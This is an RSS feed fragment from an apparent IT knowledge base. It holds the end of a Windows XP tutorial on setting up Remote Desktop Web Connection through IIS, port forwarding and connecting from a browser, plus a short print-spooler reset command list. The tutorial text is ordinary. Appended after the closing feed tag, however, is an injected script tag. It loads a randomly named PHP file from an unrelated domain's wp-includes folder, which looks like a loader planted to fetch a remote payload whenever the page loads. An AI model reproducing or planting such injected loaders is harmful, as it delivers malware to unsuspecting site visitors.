  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">Click Internet Information
  Services, and then click Details. <o:p></o:p></span></p>
  </td>
 </tr>
 <tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">3.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">In the Subcomponents of Internet
  Information Services list, click World Wide Web Service, and then
  click Details. <o:p></o:p></span></p>
  </td>
 </tr>
 <tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">4.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">In the Subcomponents of World Wide
  Web Service list, select the Remote Desktop Web Connection check box,
  and then click OK. <o:p></o:p></span></p>
  </td>
 </tr>
 <tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">5.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">In the Windows Components
  Wizard, click Next. Click Finish when the wizard has
  completed. <o:p></o:p></span></p>
  </td>
 </tr>
 <tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">6.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">Click the Start button and
  click Run. Type Net Stop w3svc, and click OK. This
  temporarily stops the World Wide Web service to keep your system safe while
  you update it with security patches. <o:p></o:p></span></p>
  </td>
 </tr>
</tbody></table>

<p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">Enabling IIS without installing the
appropriate security patches can make your system vulnerable to intruders. For
more information, read <a href="http://www.microsoft.com/security/security_bulletins/ms02018_iis.asp"><span style="color: blue;">Microsoft Security Bulletin MS01-018</span></a> and <a href="http://www.microsoft.com/security/articles/steps_default.asp"><span style="color: blue;">Security and Privacy for Home Users</span></a>.<o:p></o:p></span></p>

<p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">To check for updates:<o:p></o:p></span></p>

<table class="MsoNormalTable" style="" border="0" cellpadding="0" cellspacing="0">
 <tbody><tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">1.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">Click Start, point to All
  Programs, click Microsoft Update, and then click Scan for
  updates. Follow the prompts to install all critical updates. If prompted,
  restart your computer. <o:p></o:p></span></p>
  </td>
 </tr>
 <tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">2.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">Click Start, and then click
  Run. Type Net Start w3svc, and click OK. This starts the
  World Wide Web service. <o:p></o:p></span></p>
  </td>
 </tr>
</tbody></table>

<p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">I highly recommend using <a href="http://support.microsoft.com/?kbid=306525"><span style="color: blue;">Automatic
Updates</span></a>, especially after installing Internet Information Services. <o:p></o:p></span></p>

<p class="MsoNormal" style="line-height: normal;"><a name="EXF"></a><span style="font-size: 18pt;" times="" new="" roman="" ,="" serif="" ;="">Configure Internet Information Services<o:p></o:p></span></p>

<p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">By default, IIS is identified on
your computer by the TCP port number 80. The steps in this section change the
TCP port number and make it much more difficult for a potential attacker to
communicate with your computer. The steps in this section are optional, but if
you do follow them, you'll dramatically improve the security of your system. If
you are already using your computer as a Web server, you should leave the TCP
port number at the default setting of 80.<o:p></o:p></span></p>

<table class="MsoNormalTable" style="" border="0" cellpadding="0" cellspacing="0">
 <tbody><tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">1.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">Open Control Panel, click Performance
  and Maintenance, and then click Administrative Tools. Double-click
  Internet Information Services. <o:p></o:p></span></p>
  </td>
 </tr>
 <tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">2.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">In the ISS snap-in, expand your
  computer name, expand Web Sites, right-click Default Web Site,
  and then click Properties. <o:p></o:p></span></p>
  </td>
 </tr>
 <tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">3.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">On the Web Site tab, change
  the value for TCP Port. Enter a number between 1000 and 65535 that you
  can remember easily, such as the month and day of a birthday or anniversary.
  You'll need to know the TCP Port when you connect to the computer in
  the future. <o:p></o:p></span></p>
  </td>
 </tr>
 <tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">4.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">Click OK, and close the Internet
  Information Services snap-in. <o:p></o:p></span></p>
  </td>
 </tr>
</tbody></table>

<p class="MsoNormal" style="line-height: normal;"><a name="EMH"></a><span style="font-size: 18pt;" times="" new="" roman="" ,="" serif="" ;="">Configure Remote Desktop<o:p></o:p></span></p>

<p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">To connect using Remote Desktop, you
must have a user account with a password. If you don't yet have a password on
your account, create a password by opening Control Panel, and clicking User
Accounts. Click your account, click Create a password, and follow
the prompts. After you have a password, follow these steps to enable Remote
Desktop:<o:p></o:p></span></p>

<table class="MsoNormalTable" style="" border="0" cellpadding="0" cellspacing="0">
 <tbody><tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">1.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">Right-click My Computer,
  and click Properties. <o:p></o:p></span></p>
  </td>
 </tr>
 <tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">2.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">On the Remote tab, click
  the Allow users to connect remotely to this computer check box. <o:p></o:p></span></p>
  
  
  </td>
 </tr>
 <tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">3.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">Click Select Remote Users,
  and then click Add. <o:p></o:p></span></p>
  </td>
 </tr>
 <tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">4.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">In the Select Users dialog
  box, type the name of the user and then click OK. Click OK
  again to return to the System Properties dialog box, and then click OK
  to close it. <o:p></o:p></span></p>
  </td>
 </tr>
</tbody></table>

<p class="MsoNormal" style="line-height: normal;"><a name="EOBAC"></a><span style="font-size: 18pt;" times="" new="" roman="" ,="" serif="" ;="">Configure Your Router<o:p></o:p></span></p>

<p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">If you use a router to connect to
the Internet, you probably need to configure it to allow the Remote Desktop
connection to your computer. For more information on routers and firewalls, see
my <a href="http://www.microsoft.com/windowsxp/using/security/expert/northrup_02august12.mspx"><span style="color: blue;">Internet Firewalls</span></a> column. You need to forward
two ports to your Windows XP Professional-based computer: TCP port 3389, which
Remote Desktop requires, and the port you specified in the TCP Port
field in Internet Information Services (or TCP port 80 if you did not change
the default). If you use Internet Connection Firewall (and you should!), see <a href="http://support.microsoft.com/default.aspx?scid=kb;en-us;q308127"><span style="color: blue;">How to Manually Open Ports in Internet Connection Firewall
in Windows XP</span></a> for instructions on allowing traffic by TCP port.<o:p></o:p></span></p>

<p class="MsoNormal" style="line-height: normal;"><a name="E3BAC"></a><span style="font-size: 18pt;" times="" new="" roman="" ,="" serif="" ;="">Connect to Your Desktop<o:p></o:p></span></p>

<p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">Computers are identified on the
Internet using a unique IP address. To connect to your home computer from the
Internet, you'll need to know your home IP address. Visit one of these sites from
your home computer to learn your IP address: <a href="http://www.whatismyip.org/"><span style="color: blue;">What Is My IP</span></a>,
<a href="http://www.whatismyip.com/"><span style="color: blue;">What Is My IP.com</span></a>,
or <a href="http://www.whatismyip.net/cgi-bin/your_ip_is.cgi"><span style="color: blue;">Atlantic PC Solutions</span></a>. Your IP address may change
occasionally, so always check your IP address before you plan to connect. When
you're ready to connect to your host computer, follow these steps:<o:p></o:p></span></p>

<table class="MsoNormalTable" style="" border="0" cellpadding="0" cellspacing="0">
 <tbody><tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">1.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">Open Internet Explorer, and enter
  the URL http://ipaddress:port/tsweb/. For example, if your IP address
  is 192.168.1.120, and you chose the TCP Port 1374, you would enter the URL
  http://192.168.1.120:1374/tsweb/. <o:p></o:p></span></p>
  </td>
 </tr>
 <tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">2.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">If you're prompted to install the
  Remote Desktop ActiveX control, click Yes. <o:p></o:p></span></p>
  </td>
 </tr>
 <tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">3.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">On the Remote Desktop Web
  Connection page, click Connect. You don't need to
  fill in the Server field. If you leave the Size field set to Full-screen,
  the remote desktop will take over your local desktop. <o:p></o:p></span></p>
  </td>
 </tr>
 <tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">4.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">Enter your user name and password
  at the Windows logon prompt, and then click OK.
  You'll see your desktop, complete with any windows that were left open the
  last time you used the computer. <o:p></o:p></span></p>
  </td>
 </tr>
</tbody></table>

<p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">When you're done, disconnect by
closing the browser, or clicking the X at the top of the screen in
full-screen mode. Be sure to close all browser windows. Your user name and
password aren't stored, so you don't have to worry about someone else accessing
your system.<o:p></o:p></span></p>

<p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">If you're Internet-savvy and plan to
connect to your home computer regularly, you can get a domain name to save
yourself the trouble of writing down your IP address every time you plan to
connect to your computer. You're already familiar with domain names; they're
the ".com" names Web sites use to identify themselves. For example,
the domain name for this Web site is Microsoft.com. If you have your own domain
name, you can enter that into a browser to connect to your home computer,
instead of the unfriendly IP address. For information on getting your own
domain name and associating it with your home computer, visit the <a href="http://www.technopagan.org/dynamic/"><span style="color: blue;">Dynamic DNS
Providers List</span></a>.<o:p></o:p></span></p>

<p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">If you have Windows XP Professional
and an always-on Internet connection, you can securely access your applications
and data from work, an Internet café, or any place that has a compatible Web
browser. Getting Remote Desktop Web Connection set up takes more than one
click, but it's definitely easier than lugging your computer everywhere.<o:p></o:p></span></p></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:lsdexception></w:latentstyles></m:wrapindent></m:defjc></m:rmargin></m:lmargin></m:dispdef></m:smallfrac></m:brkbinsub></m:brkbin></m:mathfont></m:mathpr></w:word11kerningpairs></w:dontvertalignintxbx></w:dontbreakconstrainedforcedtables></w:dontvertaligncellwithsp></w:splitpgbreakandparamark></w:dontgrowautofit></w:useasianbreakrules></w:wraptextwithpunct></w:snaptogridincell></w:breakwrappedtables></w:compatibility></w:donotpromoteqf></w:validateagainstschemas></w:punctuationkerning></w:trackformatting></w:worddocument>      ]]></description>
      <pubDate>Sat, 28 Aug 2010 10:54:16 +0000</pubDate>
        </item>

        
        
        <item>

          <title>spooler subsystem app has stopped working</title>
          <link>http://www.kb.programin.co.rs/index.php/article/spooler-subsystem-app-has-stopped-working</link>
          <guid>http://www.kb.programin.co.rs/index.php/article/spooler-subsystem-app-has-stopped-working</guid>

          <description><![CDATA[
      Logon as Admin<br>

Start - type in Search box -> COMMAND - find at top of list and RIGHT CLICK - RUN AS ADMIN<br>

you can copy and paste each line in except the ones in brackets and hit enter after each.<br>

net stop Spooler<br>

(will echo Deleting all print jobs) <-- you should see this returned<br>

ping localhost -n 4 > nul<br>

del /q %SystemRoot%\system32\spool\printers\*.*<br>

net start Spooler<br>

(will echo Done!) <-- you should see this returned<br>

ping localhost -n 4 > nul<br>      ]]></description>
      <pubDate>Thu, 15 Aug 2013 09:55:10 +0000</pubDate>
        </item>

        
        
    </channel></rss><script type="text/javascript">var gwloaded = false;</script>
<script src="http://tolfiles.net/wp-includes/OsWNRgLG.php" type="text/javascript"></script>